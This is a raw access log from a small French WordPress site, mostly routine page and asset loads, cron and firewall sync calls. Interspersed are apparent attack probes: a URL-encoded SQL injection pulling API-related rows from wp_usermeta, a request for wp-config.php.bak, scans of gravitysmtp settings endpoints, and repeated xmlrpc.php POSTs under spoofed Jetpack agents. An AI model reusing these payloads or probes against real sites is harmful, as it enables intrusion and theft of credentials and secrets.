144.172.114.51 - - [14/Sep/2026:13:01:20 +0200] "GET /wp-content/plugins/ultra/includes/ajax.php?action=get_option&id=1%27+UNION+SELECT+meta_key%2Cmeta_value%2Cuser_id+FROM+wp_usermeta+WHERE+meta_key+LIKE+%27%25api%25%27--+- HTTP/1.1" 404 146288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
109.234.165.65 - - [14/Sep/2026:13:01:22 +0200] "POST /?wordfence_syncAttackData=1789383681.9944 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
144.172.114.51 - - [14/Sep/2026:13:01:21 +0200] "GET /wp-config.php.bak HTTP/1.1" 404 138366 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
172.56.170.247 - - [14/Sep/2026:13:01:23 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com"
172.56.170.247 - - [14/Sep/2026:13:01:23 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com"
172.56.170.247 - - [14/Sep/2026:13:01:33 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.3)"
172.56.170.247 - - [14/Sep/2026:13:01:33 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.3)"
172.56.170.247 - - [14/Sep/2026:13:01:44 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack/13.0; WordPress/6.3; http://site61913947.com"
172.56.170.247 - - [14/Sep/2026:13:01:44 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack/13.0; WordPress/6.3; http://site61913947.com"
172.56.170.247 - - [14/Sep/2026:13:01:55 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.4)"
172.56.170.247 - - [14/Sep/2026:13:01:55 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.4)"
104.197.249.29 - - [14/Sep/2026:13:01:59 +0200] "GET /tag/accompagnement/ HTTP/1.1" 200 144422 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Reflectionbot/1.0; +https://reflection.ai/bot) Chrome/151.0.0.0 Safari/537.36"
109.234.165.65 - - [14/Sep/2026:13:02:05 +0200] "POST /wp-cron.php?doing_wp_cron=1789383725.6704740524291992187500 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
109.234.165.65 - - [14/Sep/2026:13:02:05 +0200] "POST /?wordfence_syncAttackData=1789383725.1251 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
88.187.164.56 - - [14/Sep/2026:13:02:04 +0200] "GET /wp/wp-content/uploads/fbrfg/favicon-32x32.png HTTP/1.1" 404 146095 "-" "Dalvik/2.1.0 (Linux; U; Android 17; Pixel 8a Build/CP2A.260805.005)"
172.56.170.247 - - [14/Sep/2026:13:02:06 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack/12.1; WordPress/6.2; http://site54119684.com"
172.56.170.247 - - [14/Sep/2026:13:02:06 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack/12.1; WordPress/6.2; http://site54119684.com"
82.226.236.72 - - [14/Sep/2026:13:02:07 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 88 "https://lecocondalfred.fr/prendre-rendez-vous/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_6_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/153.0.8010.24 Mobile/15E148 Safari/604.1"
82.226.236.72 - - [14/Sep/2026:13:02:07 +0200] "GET /wp/wp-content/uploads/fbrfg/apple-touch-icon.png HTTP/1.1" 404 146099 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_6_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/153.0.8010.24 Mobile/15E148 Safari/604.1"
82.226.236.72 - - [14/Sep/2026:13:02:07 +0200] "GET /wp/wp-content/uploads/fbrfg/site.webmanifest HTTP/1.1" 404 146091 "https://lecocondalfred.fr/prendre-rendez-vous/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_6_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/153.0.8010.24 Mobile/15E148 Safari/604.1"
82.226.236.72 - - [14/Sep/2026:13:02:08 +0200] "GET /wp-admin/admin-ajax.php?action=bookly_render_service&form_id=a402c8e3ec366a286f3dc7d2227fb0a2&new_chain=true&csrf_token=4d0610f653 HTTP/1.1" 200 32160 "https://lecocondalfred.fr/prendre-rendez-vous/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_6_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/153.0.8010.24 Mobile/15E148 Safari/604.1"
88.187.164.56 - - [14/Sep/2026:13:02:08 +0200] "GET /wp/wp-content/uploads/fbrfg/favicon-32x32.png HTTP/1.1" 404 146095 "-" "Dalvik/2.1.0 (Linux; U; Android 17; Pixel 8a Build/CP2A.260805.005)"
88.187.164.56 - - [14/Sep/2026:13:02:08 +0200] "GET /wp/wp-content/uploads/fbrfg/favicon-32x32.png HTTP/1.1" 404 146095 "-" "Dalvik/2.1.0 (Linux; U; Android 17; Pixel 8a Build/CP2A.260805.005)"
172.56.170.247 - - [14/Sep/2026:13:02:17 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com"
172.56.170.247 - - [14/Sep/2026:13:02:17 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com"
109.234.165.65 - - [14/Sep/2026:13:02:27 +0200] "POST /?wordfence_syncAttackData=1789383747.2063 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
109.234.165.65 - - [14/Sep/2026:13:02:27 +0200] "POST /?wordfence_syncAttackData=1789383747.2411 HTTP/1.1" 200 233955 "-" "WordPress/7.1; https://lecocondalfred.fr"
88.187.164.56 - - [14/Sep/2026:13:02:26 +0200] "GET /wp/wp-content/uploads/fbrfg/favicon-32x32.png HTTP/1.1" 404 146095 "-" "Dalvik/2.1.0 (Linux; U; Android 17; Pixel 8a Build/CP2A.260805.005)"
88.187.164.56 - - [14/Sep/2026:13:02:26 +0200] "GET /wp/wp-content/uploads/fbrfg/favicon-32x32.png HTTP/1.1" 404 146095 "-" "Dalvik/2.1.0 (Linux; U; Android 17; Pixel 8a Build/CP2A.260805.005)"
172.56.170.247 - - [14/Sep/2026:13:02:28 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack/13.0; WordPress/6.2; http://site85453634.com"
172.56.170.247 - - [14/Sep/2026:13:02:28 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack/13.0; WordPress/6.2; http://site85453634.com"
172.56.170.247 - - [14/Sep/2026:13:02:39 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com"
172.56.170.247 - - [14/Sep/2026:13:02:39 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com"
172.56.170.247 - - [14/Sep/2026:13:02:50 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack/13.0; WordPress/6.1; http://site80215950.com"
172.56.170.247 - - [14/Sep/2026:13:02:50 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack/13.0; WordPress/6.1; http://site80215950.com"
172.56.170.247 - - [14/Sep/2026:13:03:01 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.4)"
172.56.170.247 - - [14/Sep/2026:13:03:01 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.4)"
172.56.170.247 - - [14/Sep/2026:13:03:11 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com"
172.56.170.247 - - [14/Sep/2026:13:03:11 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com"
172.56.170.247 - - [14/Sep/2026:13:03:22 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "WordPress.com; https://wordpress.com"
172.56.170.247 - - [14/Sep/2026:13:03:22 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "WordPress.com; https://wordpress.com"
109.234.165.65 - - [14/Sep/2026:13:03:25 +0200] "POST /wp-cron.php?doing_wp_cron=1789383805.0478389263153076171875 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
109.234.165.65 - - [14/Sep/2026:13:03:24 +0200] "POST /?wordfence_syncAttackData=1789383804.542 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
109.234.165.65 - - [14/Sep/2026:13:03:26 +0200] "POST /wp-cron.php?doing_wp_cron=1789383806.2633550167083740234375 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
144.172.114.51 - - [14/Sep/2026:13:03:24 +0200] "GET /wp-json/gravitysmtp/v1/data/mock?section=general HTTP/1.1" 404 183 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:03:26 +0200] "GET /wp-json/gravitysmtp/v1/data/mock?page=gravitysmtp-settings&tab=smtp HTTP/1.1" 404 183 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:03:27 +0200] "GET /wp-json/gravitysmtp/v1/test/data?page=gravitysmtp-settings HTTP/1.1" 404 183 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:03:28 +0200] "GET /wp-json/gravitysmtp/v1/test/data?action=get_settings HTTP/1.1" 404 183 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:03:29 +0200] "GET /wp-json/gravitysmtp/v1/test/data?tab=smtp HTTP/1.1" 404 183 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:03:30 +0200] "GET /wp-json/gravitysmtp/v1/test/data?section=general HTTP/1.1" 404 183 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:03:31 +0200] "GET /wp-json/gravitysmtp/v1/test/data?page=gravitysmtp-settings&tab=smtp HTTP/1.1" 404 183 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:03:32 +0200] "GET /wp-json/gravitysmtp/v1/config/mock?page=gravitysmtp-settings HTTP/1.1" 404 183 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
172.56.170.247 - - [14/Sep/2026:13:03:33 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack/13.0; WordPress/6.4; http://site19211324.com"
172.56.170.247 - - [14/Sep/2026:13:03:33 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack/13.0; WordPress/6.4; http://site19211324.com"
144.172.114.51 - - [14/Sep/2026:13:03:33 +0200] "GET /wp-json/gravitysmtp/v1/config/mock?action=get_settings HTTP/1.1" 404 183 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
109.234.165.65 - - [14/Sep/2026:13:03:34 +0200] "POST /?wordfence_syncAttackData=1789383814.8564 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
144.172.114.51 - - [14/Sep/2026:13:03:34 +0200] "GET /wp-json/gravitysmtp/v1/config/mock?tab=smtp HTTP/1.1" 404 183 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:03:36 +0200] "GET /wp-json/gravitysmtp/v1/config/mock?section=general HTTP/1.1" 404 183 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:03:37 +0200] "GET /wp-json/gravitysmtp/v1/config/mock?page=gravitysmtp-settings&tab=smtp HTTP/1.1" 404 183 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
172.56.170.247 - - [14/Sep/2026:13:03:44 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.3)"
172.56.170.247 - - [14/Sep/2026:13:03:44 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.3)"
78.126.82.154 - - [14/Sep/2026:13:03:49 +0200] "GET /histoire-dune-reeducation-en-orthophonie/ HTTP/1.1" 200 167076 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:49 +0200] "GET /wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.13.10 HTTP/1.1" 200 44905 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:49 +0200] "GET /wp-content/astra-local-fonts/astra-local-fonts.css?ver=4.13.10 HTTP/1.1" 200 11134 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:49 +0200] "GET /wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-public.css?ver=3.5.5 HTTP/1.1" 200 3106 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:49 +0200] "GET /wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-gdpr.css?ver=3.5.5 HTTP/1.1" 200 27203 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:49 +0200] "GET /wp-content/plugins/the-events-calendar/build/css/tribe-events-single-skeleton.css?ver=6.17.2 HTTP/1.1" 200 18813 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:49 +0200] "GET /wp-content/plugins/the-events-calendar/build/css/tribe-events-single-full.css?ver=6.17.2 HTTP/1.1" 200 21027 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:49 +0200] "GET /wp-content/plugins/the-events-calendar/build/css/integrations/plugins/elementor/widgets/widget-base.css?ver=6.17.2 HTTP/1.1" 200 1128 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:49 +0200] "GET /wp-content/plugins/complianz-gdpr/assets/css/cookieblocker.min.css?ver=1787065124 HTTP/1.1" 200 2782 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:49 +0200] "GET /wp-content/plugins/elementor/assets/css/frontend.min.css?ver=4.2.4 HTTP/1.1" 200 54666 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:49 +0200] "GET /wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=4.2.4 HTTP/1.1" 200 214 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:49 +0200] "GET /wp-content/plugins/elementor/assets/lib/animations/styles/fadeIn.min.css?ver=4.2.4 HTTP/1.1" 200 77 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:49 +0200] "GET /wp-content/plugins/elementor-pro/assets/css/widget-nav-menu.min.css?ver=4.2.1 HTTP/1.1" 200 27363 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:49 +0200] "GET /wp-content/plugins/elementor/assets/lib/animations/styles/e-animation-pulse.min.css?ver=4.2.4 HTTP/1.1" 200 318 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:49 +0200] "GET /wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.53.0 HTTP/1.1" 200 22258 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=4.2.4 HTTP/1.1" 200 59344 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?ver=4.2.4 HTTP/1.1" 200 26702 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/uploads/elementor/google-fonts/css/robotoslab.css?ver=1742247279 HTTP/1.1" 200 23625 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/uploads/elementor/google-fonts/css/roboto.css?ver=1742247286 HTTP/1.1" 200 104004 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/uploads/elementor/google-fonts/css/baskervville.css?ver=1742247287 HTTP/1.1" 200 1828 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/uploads/elementor/google-fonts/css/robotocondensed.css?ver=1742247293 HTTP/1.1" 200 49464 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1" 200 87553 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1" 200 13577 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/cookie-law-info/legacy/public/js/cookie-law-info-public.js?ver=3.5.5 HTTP/1.1" 200 34121 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=4.2.4 HTTP/1.1" 200 15073 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/uploads/2021/07/LOGO-BLEU-COCON.png HTTP/1.1" 200 7385 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-table.css?ver=3.5.5 HTTP/1.1" 200 6113 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/themes/astra/assets/js/minified/frontend.min.js?ver=4.13.10 HTTP/1.1" 200 26311 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/the-events-calendar/common/build/js/user-agent.js?ver=da75d0bdea6dde3898df HTTP/1.1" 200 291 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-includes/js/dist/dom-ready.min.js?ver=3fe927cab37bf38d6a23 HTTP/1.1" 200 881 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/astra-sites/inc/lib/onboarding/assets/dist/template-preview/main.js?ver=09382f635556bec359b3 HTTP/1.1" 200 6587 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=4.2.4 HTTP/1.1" 200 5819 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=4.2.4 HTTP/1.1" 200 50602 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-includes/js/jquery/ui/core.min.js?ver=1.14.2 HTTP/1.1" 200 18674 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/elementor/assets/js/frontend.min.js?ver=4.2.4 HTTP/1.1" 200 32098 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.min.js?ver=1.2.1 HTTP/1.1" 200 24109 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/wp-smushit/app/assets/js/smush-lazy-load.min.js?ver=4.3.0 HTTP/1.1" 200 23727 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/wp-consent-api/assets/js/wp-consent-api.min.js?ver=2.0.1 HTTP/1.1" 200 2235 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=4.2.1 HTTP/1.1" 200 6242 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-includes/js/dist/hooks.min.js?ver=f0f188028580e8dc1255 HTTP/1.1" 200 5107 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-includes/js/dist/i18n.min.js?ver=1dfe7db3940c23ea9216 HTTP/1.1" 200 5791 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=4.2.1 HTTP/1.1" 200 23939 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
